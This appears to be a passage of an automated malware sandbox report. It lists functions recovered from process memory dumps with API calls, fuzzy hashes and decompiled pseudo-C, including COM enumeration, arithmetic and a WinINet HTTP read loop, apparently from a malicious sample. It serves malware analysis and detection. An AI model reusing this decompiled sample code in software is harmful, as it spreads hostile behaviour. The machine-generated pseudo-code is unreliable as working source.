API ID: Handle$CloseCurrentDuplicateEventProcess
String ID:
API String ID: 302482954-0
Opcode ID: 984b5ef5bbb56de029dbd7dce9ac4c8b641423bd39f96b86d14f07121313c836
Instruction ID: 1233e34ab76b021a17de08c47b4e1b9c238fb91a514ed3364a3995bebda33495
Opcode Fuzzy Hash: 984b5ef5bbb56de029dbd7dce9ac4c8b641423bd39f96b86d14f07121313c836
Instruction Fuzzy Hash: 04518E70900606EFEB21DF64D945B6ABBF5FB24310F24425EE815AB391DB70F984CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BC490, Relevance: 6.2, APIs: 4, Instructions: 160windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,004D8488), ref: 001BC4E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000400,?,00000000,00000000,004D8488), ref: 001BC517
LocalFree.KERNEL32(00000000,-00000001,00000000,?,00000400,?,00000000,00000000,004D8488), ref: 001BC655

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ByteCharFormatFreeLocalMessageMultiWide
String ID:
API String ID: 2906450291-0
Opcode ID: 22a68075bf20066dc6ac600aec7344050518eef310451dae2f71ad2919bfba3d
Instruction ID: c06fcfc00c2c4c46f97e1e971594fd08e7a89d319d8f2796296b7d9e6c909431
Opcode Fuzzy Hash: 22a68075bf20066dc6ac600aec7344050518eef310451dae2f71ad2919bfba3d
Instruction Fuzzy Hash: A251B370A00249ABEB15CF98CC55FEEBBB5EF48310F645119E411BB7C1D77069848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CE4E05, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02CE4E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2ced2a8; // 0xeba5a8
					_t5 = _t103 + 0x2cee038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2cec290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2ced2a8; // 0xeba5a8
												_t28 = _t109 + 0x2cee0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2ced2a8; // 0xeba5a8
														_t33 = _t79 + 0x2cee078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02ce4e0a
0x02ce4e13
0x02ce4e14
0x02ce4e18
0x02ce4e1e
0x02ce4e24
0x02ce4e2d
0x02ce4e33
0x02ce4e3d
0x02ce4e3f
0x02ce4e45
0x02ce4e4a
0x02ce4e55
0x02ce4e5b
0x02ce4e60
0x02ce4f82
0x02ce4e66
0x02ce4e66
0x02ce4e73
0x02ce4e79
0x02ce4e7f
0x02ce4e83
0x02ce4e89
0x02ce4e96
0x02ce4e9a
0x02ce4ea0
0x02ce4ea3
0x02ce4eab
0x02ce4eac
0x02ce4eb0
0x02ce4eb4
0x02ce4eb7
0x02ce4eba
0x02ce4ec0
0x02ce4ec9
0x02ce4ecf
0x02ce4ed0
0x02ce4ed3
0x02ce4ed4
0x02ce4ed5
0x02ce4edd
0x02ce4ede
0x02ce4edf
0x02ce4ee1
0x02ce4ee5
0x02ce4ee9
0x00000000
0x00000000
0x02ce4eef
0x02ce4ef8
0x02ce4efe
0x02ce4f08
0x02ce4f0c
0x02ce4f0e
0x02ce4f1b
0x02ce4f1f
0x02ce4f27
0x02ce4f2c
0x02ce4f3e
0x02ce4f40
0x02ce4f46
0x02ce4f46
0x02ce4f4f
0x02ce4f4f
0x02ce4f51
0x02ce4f57
0x02ce4f57
0x02ce4f5a
0x02ce4f60
0x02ce4f63
0x02ce4f6c
0x00000000
0x00000000
0x00000000
0x02ce4f6c
0x02ce4ec0
0x02ce4eba
0x02ce4ea3
0x02ce4f72
0x02ce4f72
0x02ce4f78
0x02ce4f78
0x02ce4f7e
0x02ce4f7e
0x02ce4f87
0x02ce4f8d
0x02ce4f8d
0x02ce4e4a
0x02ce4f96

APIs

SysAllocString.OLEAUT32(02CEC290), ref: 02CE4E55
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02CE4F36
SysFreeString.OLEAUT32(00000000), ref: 02CE4F4F
SysFreeString.OLEAUT32(?), ref: 02CE4F7E

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 0ff7766cb3e1fa2b0873a3827f25ff6807cdba0bb15b0282badc63c77eec4604
Instruction ID: 94ea18f554b9ff509ecb566f5ce9ac334d31dee647992288b97f1925234dd2f1
Opcode Fuzzy Hash: 0ff7766cb3e1fa2b0873a3827f25ff6807cdba0bb15b0282badc63c77eec4604
Instruction Fuzzy Hash: B7514E75D00609EFCF14DFE8C4889AEF7BAEF89704B154594E916EB210D732AE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CE137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02CE13B6
SysFreeString.OLEAUT32(00000000), ref: 02CE149B

Part of subcall function 02CE4E05: SysAllocString.OLEAUT32(02CEC290), ref: 02CE4E55

SafeArrayDestroy.OLEAUT32(00000000), ref: 02CE14EE
SysFreeString.OLEAUT32(00000000), ref: 02CE14FD

Part of subcall function 02CE52B9: Sleep.KERNEL32(000001F4), ref: 02CE5301

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 9796d5dbe21b62fadde3231275268346e6001463fd7c2b9eea3e7b47b5992290
Instruction ID: 9427c30fa01bd05b5778496f8bb3397a2385552a709a0701c092a655937a9afb
Opcode Fuzzy Hash: 9796d5dbe21b62fadde3231275268346e6001463fd7c2b9eea3e7b47b5992290
Instruction Fuzzy Hash: 0A514C35900609EFDF11CFA8C844A9AB7B6EF88714B198869E90ADB310DB71EE15CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C6F20, Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000,004D8488), ref: 001C6FBF
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001C6FEC
SetEvent.KERNEL32(00000000), ref: 001C70A0
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001C70CD

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorEvent
String ID:
API String ID: 3096193188-0
Opcode ID: 2455d696f104358ee529043a13030f468fbb06e699e87e703e69f2116275b9f3
Instruction ID: 5300db8c516a06ac50d0bdefc2b6ec4964e8233185d17c431d62090677044a44
Opcode Fuzzy Hash: 2455d696f104358ee529043a13030f468fbb06e699e87e703e69f2116275b9f3
Instruction Fuzzy Hash: 5A5137709093489FDB25DFA8C825FEEBBB4EF26314F14055EE80697781CB74A909CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0035176F, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 003517F7

Part of subcall function 0034EB34: __aulldvrm.LIBCMT ref: 0034EB65

DName::operator+.LIBCMT ref: 00351804
DName::operator=.LIBVCRUNTIME ref: 00351884
DName::DName.LIBVCRUNTIME ref: 003518A4

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 571d169829b44a8ec3b01d0b007cf464abf0703df8012648d3312ec32c28b026
Instruction ID: 3ac333bc59d54f2f36038fa50023bc341a123463b04c15402725cb4678840cdf
Opcode Fuzzy Hash: 571d169829b44a8ec3b01d0b007cf464abf0703df8012648d3312ec32c28b026
Instruction Fuzzy Hash: 7A518F74900259EFCB16CF58C890FADBBF4FF45342F1681AAE8159F261D770AA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0034B85E, Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 0034B8AF
TypeidsEqual.LIBVCRUNTIME ref: 0034B8D4
PMDtoOffset.LIBCMT ref: 0034B8EA
PMDtoOffset.LIBCMT ref: 0034B96B

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: fa93af7526eb753743332efde223ca790c9f19e25a47db358fd2b446388e111e
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: BE518935A082099FDF12CF68C481AAEFBF5EF55310F15449AEA90AB351D732FD098B90

Uniqueness

Uniqueness Score: -1.00%

Function 02CE29ED, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02CE29ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02CE8B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02CE4AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02CE2F01(_t101,  &_v236, _a8, _t96 - _t81);
					E02CE2F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02CE4AA4(_t101, 0x2ced1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02CE4AA4(_a16, _a4);
						E02CE28BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02CEAF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02CEAF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02CE9947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02CE4506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02CEA708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2ced1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02ce29f0
0x02ce29fc
0x02ce2a02
0x02ce2a07
0x02ce2a0b
0x02ce2b68
0x02ce2b6c
0x02ce2b6c
0x02ce2a11
0x02ce2a15
0x02ce2a19
0x02ce2a1c
0x02ce2a27
0x02ce2a2d
0x02ce2a32
0x02ce2a35
0x02ce2a4f
0x02ce2a5b
0x02ce2a64
0x02ce2a6e
0x02ce2a73
0x02ce2a75
0x02ce2a78
0x02ce2b26
0x02ce2b2c
0x02ce2b3d
0x02ce2b50
0x02ce2b60
0x00000000
0x02ce2b65
0x02ce2a81
0x02ce2a88
0x02ce2a8c
0x02ce2a92
0x02ce2a94
0x02ce2a96
0x02ce2a98
0x02ce2a9a
0x02ce2aa4
0x02ce2aa9
0x02ce2aab
0x02ce2aad
0x02ce2aae
0x02ce2aaf
0x02ce2ab0
0x02ce2ab7
0x02ce2abe
0x02ce2ac1
0x02ce2ac1
0x02ce2a8e
0x02ce2a8e
0x02ce2a8e
0x02ce2ac9
0x02ce2ad1
0x02ce2ada
0x02ce2adf
0x02ce2adf
0x02ce2ae4
0x00000000
0x00000000
0x02ce2ae6
0x02ce2ae9
0x02ce2af3
0x00000000
0x00000000
0x02ce2af5
0x02ce2af5
0x02ce2aff
0x02ce2adf
0x02ce2ae4
0x00000000
0x00000000
0x00000000
0x02ce2ae4
0x02ce2b09
0x02ce2b0c
0x02ce2b0f
0x02ce2b16
0x02ce2b16
0x02ce2b23
0x00000000
0x02ce2b23
0x02ce2a1e
0x02ce2a22
0x02ce2a23
0x02ce2a25
0x00000000
0x00000000
0x00000000
0x02ce2a25
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02CE2A9A
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02CE2AB0
memset.NTDLL ref: 02CE2B50
memset.NTDLL ref: 02CE2B60

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 6b61c280867557c7d718725aa53b9854bf6db2a81afd5d9f62da2a63401c0cc0
Instruction ID: 38fd06d3f1159a3da611fc7002ae1717ea62ef7212eac938d56f6f61c77f6a3b
Opcode Fuzzy Hash: 6b61c280867557c7d718725aa53b9854bf6db2a81afd5d9f62da2a63401c0cc0
Instruction Fuzzy Hash: DD417072A00219ABDF24DFA8CC84BEE776AEF84720F008529F917A7180DB719A45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 02CE5988, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02CE5988(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x2ced134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2ced164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02CE1525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x2ced134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02CE29C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02CE8B22(_v16);
										if(_t64 == 0) {
											_t64 = E02CE48CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02CE29C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02CE57DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02ce5988
0x02ce5989
0x02ce598f
0x02ce599a
0x02ce599a
0x02ce599c
0x02cea556
0x02cea55b
0x02cea55d
0x02cea562
0x02cea563
0x02cea568
0x02cea569
0x02cea574
0x02cea5a5
0x02cea5aa
0x02cea66d
0x02cea5b0
0x02cea5b7
0x02cea5bf
0x02cea66a
0x02cea5c5
0x02cea5ca
0x02cea5cf
0x02cea5d4
0x02cea65c
0x02cea5da
0x02cea5da
0x02cea5dc
0x02cea5e2
0x02cea5e3
0x02cea5e3
0x02cea5e6
0x02cea5e9
0x02cea5ef
0x02cea5f4
0x02cea5f5
0x02cea5fa
0x02cea5fd
0x02cea608
0x00000000
0x00000000
0x02cea610
0x02cea618
0x02cea624
0x02cea628
0x02cea62a
0x02cea62f
0x00000000
0x00000000
0x02cea62f
0x02cea628
0x02cea641
0x02cea644
0x02cea64b
0x02cea656
0x02cea656
0x00000000
0x02cea631
0x02cea631
0x02cea636
0x02cea638
0x02cea639
0x02cea63c
0x00000000
0x02cea63c
0x00000000
0x02cea636
0x02cea5e3
0x02cea65d
0x02cea65d
0x02cea663
0x02cea663
0x02cea5bf
0x02cea576
0x02cea57c
0x02cea584
0x02cea59d
0x02cea59f
0x00000000
0x00000000
0x02cea586
0x02cea590
0x02cea594
0x02cea59a
0x00000000
0x02cea59a
0x02cea594
0x02cea584
0x02cea676
0x02ce5991
0x02ce5991
0x02ce5998
0x02ce59a3
0x00000000
0x00000000
0x00000000
0x02ce5998

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,76D681D0), ref: 02CEA55D
GetLastError.KERNEL32(?,?,?,00000000,76D681D0), ref: 02CEA576
ResetEvent.KERNEL32(?), ref: 02CEA5EF
GetLastError.KERNEL32 ref: 02CEA60A

Part of subcall function 02CE57DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76D681D0), ref: 02CE57F4
Part of subcall function 02CE57DD: SetEvent.KERNEL32(?), ref: 02CE5804
Part of subcall function 02CE57DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02CE5836
Part of subcall function 02CE57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02CE585B
Part of subcall function 02CE57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02CE587B

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 2176574591-0
Opcode ID: 82f6bcc5270d6d766b780076d4f48af87628ab783da898551ad3e32a22a446dd
Instruction ID: bf09e93949bb80f564f9280d68abbcd6f248d937a293ff1abf7fefce96734472
Opcode Fuzzy Hash: 82f6bcc5270d6d766b780076d4f48af87628ab783da898551ad3e32a22a446dd
Instruction Fuzzy Hash: BC41B172A00604EFCF219BA5DC44BAEB7BDAFC9360F110929E553D7290EB70EA41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BD660, Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 001BD691
RtlLeaveCriticalSection.NTDLL(?), ref: 001BD6F6
RtlEnterCriticalSection.NTDLL(?), ref: 001BD717
RtlLeaveCriticalSection.NTDLL(?), ref: 001BD77F

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a94f5a58112b66ba12ab841acc555d192b8e0170275945f53ca8cd01389026ba
Instruction ID: 7f2dc5b56d8ae14ea95d3c52bef1a0aa50e960f9ba5a3f0b89812742dd801ad6
Opcode Fuzzy Hash: a94f5a58112b66ba12ab841acc555d192b8e0170275945f53ca8cd01389026ba
Instruction Fuzzy Hash: 164181797006059BDB28CF65E984BAAFBB8FF44754F19456DE819DB340EB31E800CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE6150, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02CE6150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2ced270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2ced2a8; // 0xeba5a8
				_t3 = _t8 + 0x2cee87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E02CE10B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2ced2ac, 1, 0, _t30);
					E02CE8B22(_t30);
				}
				_t12 =  *0x2ced25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02CE8F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02CE3485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2ced10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02CE8B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02ce6151
0x02ce6158
0x02ce6162
0x02ce6166
0x02ce616c
0x02ce617b
0x02ce6182
0x02ce6186
0x02ce6198
0x02ce619a
0x02ce619a
0x02ce619f
0x02ce61a6
0x02ce61fd
0x02ce61fd
0x02ce6203
0x02ce6205
0x02ce6205
0x02ce620f
0x02ce6213
0x02ce6225
0x02ce6225
0x02ce6229
0x02ce622f
0x02ce622f
0x00000000
0x02ce61bf
0x02ce61c4
0x02ce61cc
0x02ce61d0
0x02ce61d4
0x02ce61d4
0x02ce61e1
0x02ce61e5
0x02ce61e9
0x02ce623e
0x02ce6244
0x02ce6244
0x02ce61f7
0x02ce61fb
0x02ce6232
0x02ce6234
0x02ce6237
0x02ce6237
0x00000000
0x02ce6234
0x02ce61fb
0x00000000
0x02ce61e5

APIs

Part of subcall function 02CE10B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,03BA9D88,00000000,?,?,69B25F44,00000005,02CED00C,?,?,02CE30FE), ref: 02CE10E7
Part of subcall function 02CE10B1: lstrcpy.KERNEL32(00000000,00000000), ref: 02CE110B
Part of subcall function 02CE10B1: lstrcat.KERNEL32(00000000,00000000), ref: 02CE1113

CreateEventA.KERNEL32(02CED2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02CE991F,?,00000001,?), ref: 02CE6191

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

WaitForSingleObject.KERNEL32(00000000,00004E20,02CE991F,00000000,00000000,?,00000000,?,02CE991F,?,00000001,?,?,?,?,02CE7D37), ref: 02CE61F1
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02CE991F,?,00000001,?), ref: 02CE621F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02CE991F,?,00000001,?,?,?,?,02CE7D37), ref: 02CE6237

Memory Dump Source

